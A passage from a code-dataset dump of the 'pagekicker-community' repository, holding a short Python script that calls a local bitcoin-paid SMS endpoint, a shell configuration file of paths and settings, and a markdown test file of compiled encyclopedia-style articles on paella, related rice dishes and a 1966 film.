BitTransferRequests\n\nwallet = Wallet()\nrequests = BitTransferRequests(wallet)\n\n\n# request the bitcoin-enabled endpoint that you're hosting\ndef testendpoint(sms='I just paid you bitcoin to send you this message!'):\n # In a real application you would escape this message to prevent injections\n message = urllib.parse.quote_plus(sms)\n response = requests.get(url='http://localhost:5000/send-sms?text='+message)\n print((response.text))\n\nif __name__ == '__main__':\n import sys\n testendpoint(sys.argv[1])\n" }, { "alpha_fraction": 0.757676899433136, "alphanum_fraction": 0.7710280418395996, "avg_line_length": 44.15151596069336, "blob_id": "d17f19c155e5056cbdef856e292a2ad731b3412e", "content_id": "e11e13bce6f2d7d565ba3a5842e0deb13628ccf3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1498, "license_type": "permissive", "max_line_length": 124, "num_lines": 33, "path": "/conf/config.txt.save", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# configuration file\n# all these values in this block must be customized \nMACHINE_NAME=\"Fred's Personal PageKicker Box\"\nSFB_HOME=\"/home/fred/pagekicker-community\"\nLOCAL_DATA=\"$SFB_HOME/local-data/\"\nSFB_PHP_BIN=\"/usr/bin/php\"\nJAVA_BIN=\"/usr/bin/java\"\nSFB_VERSION=`git rev-parse HEAD` #replace with git command that produces unique identifier\nUSER_HOME=\"/home/$USER/\"\nLOCAL_USER=\"fred\"\nWEB_HOST=\"http://www.PageKicker.com/\"\nWEB_ROOT=$SFB_HOME\"pk-html/\" # place where html files generated by PK for users are stored\nWEB_SCRIPTPATH=\"scripts/\" \nAPACHE_ROOT=\"https://www.facebook.com/detroitzoo/videos/1046010298770701/\"\nLOCAL_MYSQL_PATH=\"/opt/bitnami/mysql/bin/mysql\"\nLOCAL_MYSQL_USER=\"root\"\nLOCAL_MYSQL_PASSWORD=\"$PASSWORD\"\nepubcheckjarpath=$scriptpath\"lib/epubcheck-3.0/epubcheck-3.0.jar\" # not used below here no customization should be necessary\nmetadatatargetpath=$SFB_MAGENTO_HOME\"var/import/\" # these all follow Magento file structure\nmediatargetpath=$SFB_MAGENTO_HOME\"media/import/\"\nmediaarchivetxt=$SFB_MAGENTO_HOME\"media/archive/txt/\"\nebooksdelivery=$SFB_MAGENTO_HOME\"ebooks/\"\nscriptpath=$SFB_HOME\"scripts/\" # all PK programs run from $scriptpath unless special circumstances require\ntextpath=$SFB_HOME\"txt/\"\nimagedir=\"images/\"\nlogdir=$LOCAL_DATA\"logs/uuid/\"\nsfb_log=$logdir\"sfb_log.txt\"\nxformlog=$logdir$uuid\"/xformlog.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\nsfb_log_archive=$LOCAL_DATA\"archives/sfb_log_archive.txt\"\nebooksdelivery=$SFB_MAGENTO_HOME\"media/ebooks/\"\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 
0.7731488943099976, "alphanum_fraction": 0.7770857214927673, "avg_line_length": 40.6483154296875, "blob_id": "f91bc95cdb5d444e1cf5346dfd3e5a53e5f908e4", "content_id": "250ff2de2f072960db4e576dcb236199512e6589", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 37229, "license_type": "permissive", "max_line_length": 992, "num_lines": 890, "path": "/test/tmpbody.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " \n \n \n \n# Algorithmic Content\n\n\n\n\n## Paella\n\n\n\nPaella (Valencian pronunciation: [paˈeʎa] or [pəˈeʎə], Spanish: [paˈeʎa]; English approximation: /pɑːˈeɪlə, -ˈeɪljə, -ˈeɪjə, -ˈɛlə, -ˈjɛlə/ or /paɪˈɛlə/) is a Valencian rice dish with ancient roots that originated in its modern form in the mid-19th century near Albufera lagoon on the east coast of Spain adjacent to the city of Valencia. Many non-Spaniards view paella as Spain's national dish, but most Spaniards consider it to be a regional Valencian dish. Valencians, in turn, regard paella as one of their identifying symbols.\n\nTypes of paella include Valencian paella (Spanish: paella valenciana), vegetarian/vegan paella (Spanish: paella de verduras), seafood paella (Spanish: paella de marisco), and mixed paella (Spanish: paella mixta), but there are many others as well. Valencian paella is believed to be the original recipe and consists of white rice, green beans (bajoqueta and tavella), meat (chicken and rabbit), white beans (garrofón), snails, and seasoning such as saffron and rosemary. Another very common but seasonal ingredient is artichoke. Seafood paella replaces meat with seafood and omits beans and green vegetables. Mixed paella is a free-style combination of meat from land animals, seafood, vegetables, and sometimes beans. Most paella chefs use bomba rice due to it being harder to overcook, but Valencians tend to use a slightly stickier (and thus more susceptible to overcooking) variety known as Senia. All types of paellas use olive oil.\n\n\n\n\n\n### Etymology ##\n\nPaella is a Valencian word which derives from the Old French word paelle for pan, which in turn comes from the Latin word patella for pan as well. Patella is also akin to the modern French poêle, the Italian padella and the Old Spanish padilla.\n\nValencians use the word paella for all pans, including the specialized shallow pan used for cooking paellas. However, in most other parts of Spain and throughout Latin America, the term paellera is more commonly used for this pan, though both terms are correct, as stated by the Royal Spanish Academy, the body responsible for regulating the Spanish language in Spain. Paelleras are traditionally round, shallow and made of polished steel with two handles.\n\n\n\n\n\n### History ##\n\n\n\n\n\n#### Possible origins ###\n\n\n\nThe Moors of Moorish Spain began rice cultivation around the 10th century. Consequently, residents of the Valencian region often made casseroles of rice, fish and spices for family gatherings and religious feasts, thus establishing the custom of eating rice in Spain. This led to rice becoming a staple by the 15th century. Afterwards, it became customary for cooks to combine rice with vegetables, beans and dry cod, providing an acceptable meal for Lent. 
Along Spain's eastern coast, rice was predominantly eaten with fish.\n\nSpanish food historian Lourdes March notes that the dish \"symbolizes the union and heritage of two important cultures, the Roman, which gives us the utensil and the Arab which brought us the basic food of humanity for centuries.\"\n\n\n\n\n\n#### Valencian paella ###\n\nOn special occasions, 18th century Valencians used calderos to cook rice in the open air of their orchards near lake Albufera. Water vole meat was one of the main ingredients of early paellas, along with eel and butter beans. Novelist Vicente Blasco Ibáñez described the Valencian custom of eating water voles in Cañas y Barro (1902), a realistic novel about life among the fishermen and peasants near lake Albufera.\n\nLiving standards rose with the sociological changes of the late 19th century in Spain, giving rise to gatherings and outings in the countryside. This led to a change in paella's ingredients as well, using instead rabbit, chicken, duck and sometimes snails. This dish became so popular that in 1840 a local Spanish newspaper first used the word paella to refer to the recipe rather than the pan.\n\nThe most widely used, complete ingredient list of this era was as follows: short-grain white rice, chicken, rabbit, snails (optional), duck (optional), butter beans, great northern beans, runner beans, artichoke (a substitute for runner beans in the winter), tomatoes, fresh rosemary, sweet paprika, saffron, garlic (optional), salt, olive oil and water. Poorer Valencians, however, sometimes used nothing more than snails for meat. Valencians insist that only these ingredients should go into making modern Valencian paella.\n\n\n\n\n\n#### Seafood and mixed paella ###\n\n\n\nOn the Mediterranean coast, Valencians used seafood instead of meat and beans to make paella. Valencians regard this recipe as authentic as well. In this recipe, the seafood is served in the shell. A variant on this is paella del senyoret which utilizes seafood without shells. Later, however, Spaniards living outside of Valencia combined seafood with meat from land animals and mixed paella was born. This paella is sometimes called \"preparación barroca\" (baroque preparation) due to the variety of ingredients and its final presentation.\n\nDuring the 20th century, paella's popularity spread past Spain's borders. As other cultures set out to make paella, the dish invariably acquired regional influences. Consequently, paella recipes went from being relatively simple to including a wide variety of seafood, meat, sausage, (even chorizo) vegetables and many different seasonings. However, the most globally popular recipe is seafood paella.\n\nThroughout non-Valencian Spain, mixed paella is very popular. Some restaurants in Spain (and many in the United States) that serve this mixed version, refer to it as Valencian paella. However, Valencians insist only the original two Valencian recipes are authentic. They generally view all others as inferior, not genuine or even grotesque.\n\n\n\n\n\n### Basic cooking methods ##\n\nAccording to tradition in Valencia, paella is cooked over an open fire, fueled by orange and pine branches along with pine cones. This produces an aromatic smoke which infuses the paella. 
Also, dinner guests traditionally eat directly out of the paellera.\n\nSome recipes call for paella to be covered and left to settle for five or ten minutes after cooking.\n\n\n\n\n\n#### Valencian paella ###\n\n\n\nThis recipe is standardized because Valencians consider it traditional and very much part of their culture. Rice in Valencian paella is never braised in oil, as pilaf, though the paella made further southwest of Valencia often is.\n\nHeat oil in a paella.\n\nSauté meat after seasoning with salt.\n\nAdd green vegetables and sauté until soft.\n\nAdd garlic (optional), grated tomatoes, beans and sauté.\n\nAdd paprika and sauté.\n\nAdd water, saffron (and/or food coloring), snails (optional) and rosemary.\n\nBoil to make broth and allow it to reduce by half.\n\nRemove the rosemary once flavour has infused or it starts to fall apart.\n\nAdd rice and simmer until rice is cooked.\n\nGarnish with more fresh rosemary.\n\n\n\n\n\n#### Seafood paella ###\n\n\n\nRecipes for this dish vary somewhat, even in Valencia. Below is a recipe by Juanry Segui, a prominent Valencian chef.\n\nMake a seafood broth from shrimp heads, onions, garlic and bay leaves.\n\nHeat oil in a paellera.\n\nAdd mussels. Cook until they open and then remove.\n\nSauté Norway lobster and whole, deep-water rose shrimp. Then remove both the lobster and shrimp.\n\nAdd chopped cuttlefish and sauté.\n\nAdd shrimp tails and sauté.\n\nAdd chunks of whitefish.\n\nAdd garlic and sauté.\n\nAdd grated tomato and sauté.\n\nAdd rice and braise in sofrito.\n\nAdd paprika and sauté.\n\nAdd seafood broth and then saffron (and/or food coloring).\n\nAdd salt to taste.\n\nAdd the deep-water rose shrimp, mussels and Norway lobster that were set aside.\n\nSimmer until rice is cooked.\n\n\n\n\n\n#### Mixed paella ###\n\n\n\nThere are countless mixed paella recipes. The following method is common to most of these. Seasoning depends greatly on individual preferences and regional influences. However, salt, saffron and garlic are almost always included.\n\nMake a broth from seafood, chicken, onions, garlic, bell peppers and bay leaf.\n\nHeat oil in a paellera.\n\nSear red bell pepper strips and set aside.\n\nSear crustaceans and set aside.\n\nSeason meat lightly with salt and sauté meat until golden brown.\n\nAdd onions, garlic and bell peppers. Sauté until vegetables are tender.\n\nAdd grated tomatoes and sauté.\n\nAdd dry seasonings except for salt.\n\nAdd rice.\n\nBraise rice until covered with sofrito.\n\nAdd broth.\n\nAdd salt to taste.\n\nAdd saffron (and/or food coloring) and mix well.\n\nSimmer until rice is almost cooked.\n\nRe-place crustaceans.\n\nContinue simmering until rice and crustaceans are finished cooking.\n\nGarnish with seared red bell pepper strips.\n\n\n\n\n\n#### For all recipes ###\n\nAfter cooking paella, there is usually a layer of toasted rice at the bottom of the pan, called socarrat in Spain. This is considered a delicacy among Spaniards and is essential to a good paella. The toasted rice develops on its own if the paella is cooked over a burner or open fire. If cooked in an oven, however, it will not. To correct this, place the paellera over a high flame while listening to the rice toast at the bottom of the pan. Once the aroma of toasted rice wafts upwards, it is removed from the heat. 
The paella must then sit for about five minutes (most recipes recommend the paella be covered with a tea-towel at this point) to absorb the remaining broth.\n\n\n\n\n\n### Competitions and records ##\n\nIt has become a custom at mass gatherings in the Valencian Community (festivals, political campaigns, protests, etc.) to prepare enormous paellas, sometimes to win mention in the Guinness Book of World Records. Chefs use gargantuan paelleras for these events.\n\nValencian restaurateur Juan Galbis claims to have made the world's largest paella with help from a team of workers on 2 October 2001. This paella fed about 110,000 people according to Galbis' former website. Galbis says this paella was even larger than his earlier world-record paella made on 8 March 1992 which fed about 100,000 people. Galbis's record-breaking 1992 paella is listed in Guinness World Records.\n\n\n\n\n\n### Similar dishes ##\n\n\n\nTraditional Valencian cuisine offers recipes similar to paella valenciana and paella de marisco such as arròs negre, arròs al forn, arròs a banda and arròs amb fesols i naps. Fideuà is a noodle dish variation of the paella cooked in a similar fashion, though it may be served with allioli sauce.\n\nThe following is a list of other similar rice dishes:\n\nThieboudienne\n\nBiriyani\n\nArroz a la valenciana\n\nArroz con pollo\n\nArroz con gandules\n\nArròs negre\n\nJambalaya\n\nPilaf\n\nRisotto\n\nJollof rice\n\nArroz meloso\n\nBisi Bele Bath\n\n\n\n\n\n### See also ##\n\n\n\nLatin American cuisine\n\nList of rice dishes\n\nMediterranean cuisine\n\nSpanish cuisine\n\nRisotto\n\nPilaf\n\n\n\n\n\n### Notes ##\n\n\n\n\n\n### References and further reading ##\n\nMarch,, Lourdes (1985). El Libro De La Paella Y De Los Arroces. Madrid: Alianza. ISBN 8420601012. \n\nRíos, Alicia and Lourdes March (1992). The Heritage of Spanish Cooking. New York: Random House. ISBN 0-679-41628-5. \n\n\n\n\n\n### External links ##\n\nPaella Recipe\n\nOriginal Paella Recipe from Valencia Spain\n\nBlog on cooking paella\n\n\n\n## Arròs negre\n\n\n\nArròs negre (Valencian pronunciation: [aˈrɔz ˈneɣɾe], Spanish: arroz negro) is a Valencian and Catalan dish made with cuttlefish (or squid) and rice, somewhat similar to seafood paella. Some mistakenly call it paella negra (\"black paella\" in Spanish), however it is traditionally not called a paella even though it is prepared in the same manner.\n\nArròs negre should not be confused with black rice, the collective name for several cultivars of heirloom rice that have a naturally dark color.\n\nThe traditional recipe for this dish calls for squid ink, cuttlefish or squid, white rice, garlic, green cubanelle peppers, sweet paprika, olive oil and seafood broth. 
However, many cooks add other seafood as well, such as crab and shrimp.\n\nThe dish's dark color comes from squid ink which also enhances its seafood flavor.\n\nIn addition to Valencia and Catalonia, this dish is popular in Cuba and Puerto Rico where on both islands it is known as arroz con calamares (\"rice with squid\" in Spanish).\n\nFideuà negra (\"black noodles\" in Catalan) is a variation made with noodles instead of rice and is usually served with aioli.\n\n\n\n\n\n### See also ##\n\nCatalan cuisine\n\nList of rice dishes\n\nList of seafood dishes\n\nValencian cuisine\n\n\n\n\n\n### References ##\n\n\n\n## Fideuà\n\n\n\nFideuà (dialectal pronunciation of the Valencian/Catalan word fideuada \"large amount of noodles\") is a seafood dish originally from the coast of Valencia which is similar to paella, and even more to arròs a banda, but with noodles instead of rice. Its main ingredients are: pasta noodles (usually hollow), fish (rockfish, monkfish, cuttlefish, squid), and shellfish (Squilla mantis, shrimp, crayfish). It is seasoned mainly with lemon.\n\n\n\n\n\n### History ##\n\nThe invention of fideuà is attributed to a picturesque story. Gabriel Rodriguez Pastor, (Gabrielo from a kiosk in the port district of Grau in Gandía), worked as a cook in a boat and Juan Bautista Pascual (Zábalo), was the youngest man in the boat and his assistant. According to Gabriel's family, the boat captain loved rice and the rest of sailors almost never received their full portion of arròs a banda, the dish that the cook usually prepared. Trying to find a solution for the problem, the cook had the idea of using noodles instead of rice to see if the result was a little less appetizing for the captain.\n\nThe invention was liked, and fame of the dish spread though harbor restaurants such as the \"Pastaora House,\" where they cooked the first \"fiduedades.\" The dish became distinctive and essential in the area.\n\n\n\n\n\n### Characteristics ##\n\nJust like paella, it is cooked in a special wide and flat frying pan, also called paella, although there are other traditional variants made in a casserole.\n\nGandia is the birthplace of fideuà, and in this city of La Safor region there is an annual competition-contest where the best cooks try to prepare the best fideuà.\n\n\n\n\n\n### Curiosities ##\n\nCurrently, various skill competitions for chefs are done in preparing fideuá.\n\n\n\n\n\n### See also ##\n\n\n\nList of seafood dishes\n\n\n\n\n\n### References ##\n\n\n\nes:Fideuà\n\n\n\n## Gata de Gorgos\n\n\n\nGata de Gorgos (Valencian: [ˈɡata ðe ˈɣoɾɣos], Spanish: [ˈɡata ðe ˈɣorɣos]) is a village in the Marina Alta region of the north Costa Blanca in Spain. It has a population of 5,325 (2005).\n\nThe village is known for its wicker industry and for having an unusually large number of bars and restaurants per capita. Boasting over 30 bars, the most popular are Ca Corder, which is located in the church square, and Ca Patrics, which is located in the Placa Nuevo.\n\nThe town's key fiestas take place during July to honour The Christ of the Calvary.(Fiestas en honor al Santísimo Cristo del Calvario). A key part of this event includes bull running along the street known as Paseo de Alicante - another is when the town's young men and women who are 'coming of age' form groups called 'Quintos' and march through the town accompanied by music and watched by family and friends. 
The highlight to many is the Paella Night, where most of the town congregate in the school to cook paella in the open air before being entertained by a local band.\n\n\n\n\n\n### References ##\n\n\n\n\n\n### External links ##\n\nWeb de l'Ajuntament de Gata\n\nThe Official Valencian Government Portal for events in Gata de Gorgos\n\nInstitut Valencià d'Estadística.\n\nPortal de la Direcció General d'Administració Local de la Generalitat.\n\nDiari Parlem.\n\nEl temps en Gata de Gorgos.\n\n\n\n## Valencian cuisine\n\n\n\nValencian cuisine is a Mediterranean cuisine as cooked in the Valencian Community, Spain. Its basic ingredients are vegetables, seafood and meat. It is famous worldwide for its rices, such as paella, and its citrus fruits. The cuisine of neighbouring regions have given and received important contributions from Valencian gastronomy, amongst them Balearic cuisine, Catalan cuisine, Aragonese cuisine, Manchego cuisine and Murcian cuisine.\n\n\n\n\n\n### Main dishes ##\n\n\n\nPaella. The most famous Valencian dish is one of the most recent. Although many towns claim to be the birthplace of paella, it is usually considered native to Albufera and Ribera, just south of Valencia. It can be found in two main varieties, with chicken and rabbit or with seafood. Nowadays paella can be found around the world and especially throughout Spain and Latin America. The name comes from the large pan ('paella' in Valencian) where it is cooked.\n\nArròs negre. Rice with squid and squid ink cooked in a paella.\n\nArròs al forn. A rice dish baked in the oven and usually containing sausages, chickpeas and potato amongst other ingredients, usually made with the surplus of the local typical stew.\n\nFideuà. A dish based on noodles and seafood, typical of the Valencian coast and originally from Gandia.\n\nArròs amb costra A kind of arròs al forn but covered with an egg which provides the \"crust\" in the name. It is typical of most of the south of Valencia and especially of Elche.\n\nGazpacho. A famous Spanish dish typical throughout south and central Spain. In the Valencia region it is typical of the southern and inland areas and is the quintessential summer dish.\n\nArròs a banda. A humble preparation typical of the Valencian coast with rice, fish, and sweet potato.\n\nEmbotits. Cured sausages.\n\nSobrassada a typically Majorcan meat-product which is produced in the Marina.\n\nBollit. Vegetable stew.\n\nSuquet de peix. An eel, potato, garlic and fish stew, similar to Bouillabaisse.\n\nAll i pebre. a signature dish for the area around Valencia city and immediately to the south, containing peppers, garlic and potatoes with eels.\n\nEsgarrat or Pericana in the mountains of Alcoi. It is a mixture of roasted peppers and strips of salted cod. The pericana also adds garlic.\n\nEspencat. Roasted vegetables, typically peppers and aubergine but other vegetables can be added.\n\nCoques. Ancient local salty pastries with a common origin with Italian Pizza.\n\n\n\n\n\n### Sauces ##\n\nAllioli. This is a thick sauce, common to most of the Western Mediterranean, based on mixing garlic and olive oil to which egg is sometimes added. It usually has a characteristic yellow colour.\n\nMullador. A sauce whose ingredients may vary but always includes tomatoes. The remaining ingredients depend on the time of year and the vegetables available in each area. There are similar preparations throughout the Mediterranean. 
Other names for this kind of sauce are \"samfaina\" in Catalonia, \"tomacat\" or \"tombet\" in Majorca and ratatouille in France; much simpler is the \"salsa napoletana\" in Italy. In Alcoi and further south, this sauce may include tuna as is the case with \"pisto\", typical of Castile la Mancha.\n\nPicada. This is a sauce composed of crushed nuts - usually almonds - olive oil, parsley and a little milk. It usually accompanies fish dishes.\n\n\n\n\n\n### Sweets, apéritifs, desserts and drinks ##\n\n\n\nPestinyos. A small, sweet and dry pastry folded into three and flavoured with orange and aniseed.\n\nPastissets, a typical sweet made of pastry with a sweet almond or sweet potato filling. It is of probable Arab origin and is typical of most of Valencia and the south of Catalonia. A similar dish, called rubiols, is typical in Majorca.\n\nArnadí typical of Xàtiva\n\nCoca (pastry). A kind of pizza or pie which can be either sweet or savoury. It is typical to most of Valencia as well as in the other territories of Catalan culture. The most common kinds in Valencia are the coca de llanda, a kind of sponge-cake, often pumpkin-, lemon- or apple-flavoured; coca de mullador - or coca de Sant Joan in Alicante - a small pizza-like pastry with ratatouille on top and occasionally tuna or other titbits; and coca de xulla, a flat bread with bacon and sausages on top. \"Coca de molletes\" typical of Alicante with soft salty flour crumbles.\n\nCoques de dacsa, originally from Ròtova near Gandia and commercially available in the area around Denia and Gandia. These are flat pastry bases similar to Mexican tortillas, and topped with all kinds of titbits such as mullador. A similar preparation are coques de mestall, from the neighbouring county Valldigna.\n\nArrop i tallaetes. A dessert which immerses fruit pieces in a sweet syrup made from grape must.\n\nFartons. These are pastry fingers designed to be dipped in orxata.\n\nOrxata (Horchata). A drink made from submerging rice or other products in water for long periods. There are at least two kinds made locally. The first is Orxata de Xufa, made with tigernuts, quintessentially Valencian and produced only in the area of Alboraya, just north of Valencia. The second is Orxata d'Ametlla, made and consumed in the Alicante and Xixona.\n\nPeladillas (Jordan almonds). Typical from Casinos.\n\nTorró. A kind of nougat, with strong tradition of Xixona and Alicante with, available in two styles, hard and soft.\n\nFigues albardaes (a kind of fig fritter that are traditional in Falles)\n\nBunyols. Yet another Arab-inspired pastry, these are dough-balls which are fried and covered with sugar, which can be found in various parts of Mediterranean Spain such as Cadaqués, as well as in Madrid or even Latin America although in these cases they are not sweet. The Valencian variety habitually includes pumpkin in the dough, though often in commercial preparations this is not so. They are typical of Falles.\n\n\n\n\n\n### Wines and liquors ##\n\nValencian wines are also well-regarded, with three Protected Designation of Origin: Alicante, Utiel-Requena and Valencia. In Utiel-Requena, champagne is made under the cava denomination. 
Meanwhile, muscat (known as \"moscatell\" also called \"mistela\") is produced in the Marina Alta (near Denia) under Alicante DO and also in Turís, Cheste, Godelleta and surroundings, under the Valencia DO.\n\n\n\n\n\n### See also ##\n\nArroz a la valenciana, a rice dish typical in Portugal and Latin America and inspired by paella.\n\n\n\n\n\n### External links ##\n\nOfficial tourist board guide to cuisine in the Land of Valencia\n\nValencian dishes\n\nLa cuina valenciana (Catalan)\n\n\n\n## Arroz a la valenciana\n\n\n\nArroz a la valenciana (Spanish) or Arroz à valenciana (Portuguese) is a typical Latin American dish which is also considered as a part of Filipino cuisine. In Chile and Nicaragua it is referred to as a Latin American version of Valencian paella.\n\n\n\n\n\n### Ingredients ##\n\nThe dish consists of one pound of glutinous rice or regular rice, chicken, chorizo, two ounces of butter, one onion, one red bell pepper, two tomatoes, a can of tomato paste, and salt and pepper to taste. It is usually prepared with beer, along with white wine.\n\n\n\n\n\n### Preparation ##\n\nTo prepare the dish, first the chicken is cooked in sufficient water, then onions, red bell pepper and salt are added. When it's finished the chicken is stripped and any bones are discarded. After comes the preparation of the rice where the chicken is then added and left to cook. Afterwards, in a frying pan, butter, onion, and red pepper are fried. Later the chicken and rice is added and mixed together along with sausage and the optional addition of beer or white wine.\n\n\n\n\n\n### See also ##\n\n\n\nList of chicken dishes\n\nList of rice dishes\n\nRelated dishes\n\nArroz con pollo\n\nArroz negro\n\nFideuà\n\nJambalaya\n\nPaella\n\nPilaf\n\nRisotto\n\n\n\n\n\n### References ##\n\n\n\n## Finders Keepers (1966 film)\n\n\n\nFinders Keepers is a 1966 British musical film directed by Sidney Hayers, written by Michael Pertwee and starring Cliff Richard. It was released in the U.S. the following year. A search was made to find an actress to play the Spanish girl who falls for Cliff. The 21-year-old Viviane Ventura won the role: born in London, but fluent in Spanish, she sang a spirited duet in the film with Cliff: Paella.\n\n\n\n\n\n### Plot ##\n\nCliff and The Shadows travel to a Spanish town for a gig. When they arrive they are puzzled to find the area empty. They find out that a small bomb has accidentally been dropped on the town and the villagers have fled in panic that it will go off. The boys decide to find the bomb and restore peace in the village, with some musical numbers along the way.\n\n\n\n\n\n### Cast ##\n\nCliff Richard - Cliff\n\nHank Marvin - Himself (as The Shadows)\n\nBruce Welch - Himself (as The Shadows)\n\nBrian Bennett - Himself (as The Shadows)\n\nJohn Rostill - Himself (as The Shadows)\n\nRobert Morley - Colonel Roberts\n\nPeggy Mount - Mrs. Bragg\n\nViviane Ventura - Emilia\n\nGraham Stark - Burke\n\nJohn Le Mesurier - Mr. X\n\nEllen Pollock - Grandma\n\nErnest Clark - Air Marshal\n\nBurnell Tucker - Pilot\n\nGeorge Roderick - Priest\n\nBill Mitchell - G.I. 
Guard\n\nRobert Hutton - Commander\n\n\n\n\n\n### Critical reception ##\n\nThe Radio Times described the film as a \"dismal romp\" which \"marked the end of Cliff's screen collaboration with the Shadows\"; while Variety wrote, \"Michael Pertwee’s screenplay does not build up much urgency or suspense but provides opportunity for colorful fiesta, a gentle romance between Richard and Ventura, some verbal dueling between Robert Morley and Graham Stark\"; and Sky Movies noted, \"Peggy Mount and Robert Morley (For ##10,000, I'd walk naked down Horse Guards Parade') provide formidable comedy support for the stars.\" \n\n\n\n\n\n### Music ##\n\nMusic and lyrics by The Shadows. Songs include: \"Finders Keepers,\" \"Washerwoman,\" \"My Way,\" \"Paella,\" \"La, La, La,\" \"Fiesta,\" and \"Time Drags By.\"\n\n\n\n\n\n### Soundtrack ##\n\nThe soundtrack album for Finders Keepers by Cliff Richard and The Shadows was released on Columbia Records (Columbia SCX 6079)\n\n\"Finders Keepers\" (Cliff Richard and The Shadows)\n\nTime Drags By (Cliff Richard and The Shadows)\n\nWasherwoman (Cliff Richard and The Shadows)\n\nLa La La song (Cliff Richard and The Shadows)\n\nMy Way (The Shadows)\n\nOh Senorita (Cliff Richard and The Shadows)\n\nSpanish Music (The Shadows)\n\nFiesta (Cliff Richard and The Shadows)\n\nThis Day (Cliff Richard and The Shadows)\n\nPaella (Cliff Richard and The Shadows)\n\nFinders Keepers/My Way/Paella/Fiesta (Medley) (The Shadows)\n\nRun to the Door (not from the film)\n\nWhere Did the Summer Go (not from the film)\n\nInto Each Life Some Rain Will Fall (Cliff Richard and The Shadows) (not from the film)\n\n\n\n\n\n### Tagline ##\n\nThe film's tagline is 'The beat is the wildest! The blast is the craziest!... and the fun is where you find it!'\n\nThe film is rated M in New Zealand for sexual references.\n\n\n\n\n\n### References ##\n\n\n\n\n\n### External links ##\n\nFinders Keepers at the Internet Movie Database\n\n\n\n## Arroz con pollo\n\n\n\nArroz con pollo (rice with chicken) is a traditional dish of Spain and Latin America, closely related to paella. In the Dominican Republic it is called locrio de pollo, and in Saint Martin it is called lokri or locreo.\n\nThere is some debate as to whether it originated in Spain. Puerto Ricans consider it one of their classic recipes. Many Puerto Ricans note that arroz con pollo cannot be made without beer and annatto oil and saffron is no substitute. Beer and annatto are rarely used in Spanish cooking and never in arroz con pollo there. Annatto is frequently used in Puerto Rican cooking especially in rice dishes like arroz con gandules (rice with pork and pigeon peas) and arroz con maiz (rice with corn and sausage). Beer is used in many Puerto Rican dishes like pollo guisado (braised stewed chicken) and asopao de pollo (chicken rice stew). 
Arroz con pollo and most Puerto Rican rice dishes are highly seasoned with sofrito, which is another key ingredient in arroz con pollo.\n\nFood writer Elisabeth Lambert Ortiz, pointing out the international aspects of the dish, notes the origin of Arroz con Pollo in the Spanish forms of pilaf, already reflecting international influences: chicken was brought from India and rice from Asia; saffron (used for the yellow colour in Spain, instead of annatto) was introduced by Phoenician traders; tomatoes and peppers (also known as sofrito) are natives of the Americas.\n\n\n\n\n\n### See also ##\n\nArroz caldo\n\nBiryani\n\nCabidela\n\nChicken and rice (disambiguation)\n\nList of chicken dishes\n\nList of rice dishes\n\n\n\n\n\n### References ##\n\n\n\n\n\n### External links ##\n\n\n\n## Arròs a banda\n\n\n\nArròs a banda (Valencian term for rice in a side, translated as Arroz a banda in Spanish) is a dish of rice cooked in fish stock, typical of the coastal area of Alicante (and, per extension, in most of Land of Valencia), Spain, and distinct from the paella of Valencia. It is popular up to Garraf, Barcelona (Catalonia) and down to Murcia (Region of Murcia).\n\nIt originated with the fishermen of Alicante, who sold off their best fish and kept the leftovers for stock, used to cook the rice. It is usually served with alioli.\n\n\n\n\n\n### References ##\n\nhttp://www.spanish-food.org/rice-and-pasta-arroz-a-banda.html\n\n\n\n## Jambalaya\n\n\n\nJambalaya (/ˌdʒʌmbəˈlaɪ.ə/ JUM-bə-LY-ə) is a Louisiana Creole dish of Spanish and French (especially Provençal) influence. It consists of meat and vegetables mixed with rice. Traditionally, the meat always includes sausage of some sort, often a smoked sausage such as Andouille, along with some other meat or seafood, frequently pork, chicken, crayfish, or shrimp. The vegetables are usually a sofrito-like mixture known as the \"holy trinity\" in Creole and Cajun cooking, consisting of onion, celery, and green bell pepper, though other vegetables such as carrots, tomatoes, chilis, and garlic are also used. After browning and sauteeing the meat and vegetables, rice, seasonings, and broth are added and the entire dish is cooked together until the rice is done.\n\nJambalaya is similar to (but distinct from) other rice-and-meat dishes known in Louisiana cuisine. Gumbo uses similar sausages, meats, seafood, vegetables and seasonings, however gumbo includes filé powder and okra, which are not common in jambalaya. Gumbo is also usually served over white rice, which is prepared separate from the rest of the dish, unlike jambalaya, where the rice is prepared with the other ingredients. Étouffée is a stew which always includes shellfish such as shrimp or crayfish, but does not have the sausage common to jambalaya and gumbo. Also, like gumbo, étouffée is usually served over separately prepared rice.\n\nJambalaya has its origins in several rice-based dishes well attested in the Mediterranean cuisines of Spain and France, especially in the Spanish dish paella (native to Valencia) and the French dish known as jambalaia (native to Provence). Other seasoned rice-based dishes from other cuisines include pilaf, risotto and Hoppin' John.\n\n\n\n\n\n### Varieties ##\n\n\n\nThere are two primary methods of making jambalaya, differentiated by the presence or absence of tomatoes.\n\nThe first and most common is the city Creole jambalaya (also called \"red jambalaya\"). 
First, meat is added to the trinity of celery, peppers, and onions; the meat is usually chicken and sausage such as andouille or smoked sausage. Next vegetables and tomatoes are added to cook, followed by seafood. Rice and stock are added in equal proportions at the very end. The mixture is brought to a boil and left to simmer for 20 to 60 minutes, depending on the recipe, with infrequent stirring. Towards the end of the cooking process, stirring usually ceases. Some versions call for the jambalaya to be baked after the cooking of all the ingredients.\n\nThe second style, more characteristic of southwestern and south-central Louisiana, is rural Creole jambalaya, which contains no tomatoes (the idea being the farther away from New Orleans one gets, the less common tomatoes are in dishes). The meat is browned in a cast-iron pot. The bits of meat that stick to the bottom of the pot (sucs) are what give a rural jambalaya its brown color. A little vegetable oil is added if there is not enough fat in the pot. The trinity (of 50% onions, 25% celery, and 25% green or red bell pepper, although proportions can be altered to suit one's taste) is added and sautéed until soft. Stock and seasonings are added in the next step, and then the meats are returned to the pot. This mixture is then simmered, covered, for at least one hour. Lastly, the mixture is brought to a boil and rice is added to the pot. It is then covered and left to simmer over very low heat for at least 1/2 hour without stirring. The dish is finished when the rice has cooked.\n\nA third method is less common, the \"Cajun\" jambalaya. In this version, meat and vegetables are cooked separately from the rice. At the same time, rice is cooked in a savory stock. 